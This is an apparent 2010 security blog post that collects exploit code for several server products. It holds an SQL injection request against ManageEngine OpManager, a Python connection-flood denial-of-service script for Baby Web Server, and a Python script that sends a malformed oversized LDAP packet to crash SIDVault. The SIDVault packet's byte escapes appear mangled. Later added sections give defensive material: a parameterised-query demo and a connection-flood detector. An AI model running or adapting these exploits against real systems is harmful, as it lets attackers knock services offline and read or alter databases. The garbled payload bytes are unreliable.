Sunday, January 24, 2010

FileCOPA FTP Server 'NOOP' Command Denial Of Service Vulnerability

FileCOPA FTP Server is prone to a denial-of-service vulnerability.

A successful exploit may allow attackers to halt the server process, resulting in a denial-of-service condition.
FileCOPA FTP Server 5.01 is vulnerable; other versions may also be affected.

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3662
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3662
http://www.securityfocus.com/bid/36397/info
http://www.securityfocus.com/bid/36397/discuss
http://isc.sans.org/newssummary.html
http://secunia.com/advisories/36773/
http://archives.neohapsis.com/archives/secunia/2009-q3/1120.html



Blind SQL/XPath injection in OPMANAGER

packetstormsecurity.org/0912-exploits/opmanager-sql.txt
http://www.exploit-db.com/exploits/10372
ManageEngine OpManager 'overview.do' SQL Injection Vulnerability
http://www.securityfocus.com/bid/37289


Exploit Code

*******************************Blind SQL/XPath injection in OPMANAGER***********************************




# Exploit Title: Blind SQL/XPath injection in OPMANAGER
# Date: 8-Dec-09
# Author: Asheesh Kumar Mani Tripathi
# AKS IT Services
# Software Link: http://www.manageengine.com/products/opmanager/download.html
# Version: [app version]



Description

SQL injection is a vulnerability that lets an attacker alter backend SQL statements by manipulating user input. It occurs when a web application places user input directly into a SQL statement without properly filtering out dangerous characters. It is one of the most common application-layer attacks currently in use on the Internet. Although it is relatively easy to protect against, a large number of web applications remain vulnerable to SQL injection.
XPath injection is an attack technique used to exploit web sites that construct XPath queries from user-supplied input.

Impact
An unauthenticated attacker may execute arbitrary SQL/XPath statements on the vulnerable system. This may compromise the integrity of your database and/or expose sensitive information.

Vulnerable:

http://overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX[SQL injection]&isFromInfra=yes HTTP/1.0


GET overview.do?selectedTab=Home&operation=showVoipDashboard_ajax&requestType=AJAX'+and+31337-31337=0+--+&isFromInfra=yes HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: localhost:8060
Cookie: JSESSIONID=54FA92CB3ADBA4C71B35C69251FFE9A1;flashversionInstalled=0.0.0
Connection: Close
Pragma: no-cache

Response:
HTTP/1.1 200 OK
Date: Tues, 08 Dec 2009 11:26:21 GMT
Server: Apache/2.0.47 (Win32) mod_jk/1.2.5
Connection: close
Content-Type: text/html;charset=UTF-8
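
Added example (not part of the original advisory and not OpManager code): the request above, replayed against a constructed SQLite table, shows why the probe is interpreted as SQL when requestType is concatenated into the statement and why it matches nothing when the value is bound as a parameter. The table, column and function names are assumptions made for illustration.

```python
import sqlite3
from urllib.parse import parse_qs

# Query string of the request shown above (wrapped line rejoined).
QUERY_STRING = (
    "selectedTab=Home&operation=showVoipDashboard_ajax"
    "&requestType=AJAX'+and+31337-31337=0+--+&isFromInfra=yes"
)

def request_type(query_string):
    # parse_qs URL-decodes the value, so each '+' becomes a space.
    return parse_qs(query_string)["requestType"][0]

def make_db():
    # Constructed stand-in table; OpManager's real schema is not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE dashboard (request_type TEXT, widget TEXT)")
    db.executemany(
        "INSERT INTO dashboard VALUES (?, ?)",
        [("AJAX", "voip_summary"), ("HTML", "voip_full")],
    )
    return db

def lookup_concatenated(db, value):
    # Vulnerable pattern: the input becomes part of the SQL text, so the
    # quote closes the literal and the rest is parsed as SQL.
    sql = "SELECT widget FROM dashboard WHERE request_type = '" + value + "'"
    return [row[0] for row in db.execute(sql)]

def lookup_parameterized(db, value):
    # Hardened pattern: the driver binds the input as data only, so the
    # whole string is compared literally against request_type.
    sql = "SELECT widget FROM dashboard WHERE request_type = ?"
    return [row[0] for row in db.execute(sql, (value,))]

if __name__ == "__main__":
    db = make_db()
    value = request_type(QUERY_STRING)
    print("decoded value :", repr(value))
    print("concatenated  :", lookup_concatenated(db, value))
    print("parameterized :", lookup_parameterized(db, value))
```

The concatenated lookup returns the AJAX row even though no row holds the submitted string, which is the signal that the input reached the SQL parser; the bound lookup returns nothing.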

Pablo Software Solutions Baby Web Server Multiple Request Remote Denial of Service Vulnerability

Pablo Software Solutions Baby Web Server is prone to a remote denial-of-service vulnerability. An attacker could exploit this issue to crash the affected application, denying service to legitimate users.
http://exploits.offensive-security.com/record.php?id=10171&type=dos
packetstormsecurity.org/0911-exploits/babywebserver.py.txt
http://www.securityfocus.com/bid/36942

Exploit Code
#!/usr/bin/env python
#Author:Asheesh Kumar Mani Tripathi
#Created:Asheesh Kumar Mani Tripathi
import socket

print "****************************************************"
print "Baby Web Server 2.7.2 Vulnerbility found Denial of Service"
print "Change IP to Victim Server s.connect((127.0.0.1,80))"
print "Author: Asheesh Kumar Mani Tripathi"
print "Reason for DOS attack The Problem lies server"
print "unable to handle so much of requests "
print "*****************************************************"

host = "127.0.0.1"
port = 80

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
conn = s.connect(("127.0.0.1",80))
for i in range (1,1100):
request = "GET /some.txt HTTP/1.1 \n\n"
connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connection.connect((host, port))
connection.send(request)
print i
except:
print "Oh! Some Problem Occured Check Server is Running or Not"
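
Added example (not from the original post): a sliding-window check a defender could run over connection timestamps to spot a single source opening connections at the rate the script above does. The event format, threshold, window and addresses are constructed for illustration.

```python
from collections import defaultdict, deque

def flag_connection_floods(events, max_conns=100, window_ms=10_000):
    """Return {source_ip: timestamp_ms} for the first moment each source
    has more than max_conns new connections inside window_ms.

    events: iterable of (timestamp_ms, source_ip), sorted by timestamp.
    """
    recent = defaultdict(deque)   # per-source timestamps still in the window
    flagged = {}
    for ts, ip in events:
        window = recent[ip]
        window.append(ts)
        # Drop connections that have aged out of the window.
        while ts - window[0] > window_ms:
            window.popleft()
        if len(window) > max_conns and ip not in flagged:
            flagged[ip] = ts
    return flagged

# Constructed sample: one source opens 1099 connections 5 ms apart (the
# loop in the script runs range(1, 1100)); another opens 20 connections
# 3 seconds apart, as an ordinary client might.
FLOOD = [(i * 5, "192.0.2.10") for i in range(1, 1100)]
NORMAL = [(i * 3000, "198.51.100.7") for i in range(20)]
SAMPLE_EVENTS = sorted(FLOOD + NORMAL)

if __name__ == "__main__":
    for ip, ts in flag_connection_floods(SAMPLE_EVENTS).items():
        print(f"{ip} exceeded the limit at t={ts} ms")
```

The same per-source count can back a connection cap at a reverse proxy or firewall in front of a server that cannot enforce one itself.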

SIDVault Remote Denial of Service

#links-http://downloads.securityfocus.com/vulnerabilities/exploits/36394.py
#http://www.packetstormsecurity.org/0909-exploits/sidvault20evista-crash.txt
#http://inj3ct0r.com/%5Bremote%5D/1292
#SIDVault is prone to a remote denial-of-service vulnerability.
#Successful exploits allow remote attackers to cause the affected server to stop responding, denying service to legitimate users.
#SIDVault 2.0e for Windows is vulnerable; other versions may also be affected.

#!/usr/bin/python

#
# $ ./ldap.py
#
# SIDVault 2.0e Vista Remote Crash Vulnerability (sidvault.exe )
# Tested on Vista Home premium SP1 Windows XP ,SP1,SP2,SP3
# Coded by:asheesh anaconda

# Group DarkShinners


import sys
import socket

addr = "x33xbfx96x7c"
healthpacket = 'x41'*4095 + addr
evilpacket = '0x82x10/x02x01x01cx82x10(x04x82x10x06dc='
evilpacket += healthpacket
evilpacket +=
'nx01x02nx01x00x02x01x00x02x01x00x01x01x00x87x0bobjectClass0x00'
print "[+] Sending evil packet"
print "[+] Wait ladp is getting crashh!!!!!!!!!!!!"


s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 389))
s.send(evilpacket)
s.close()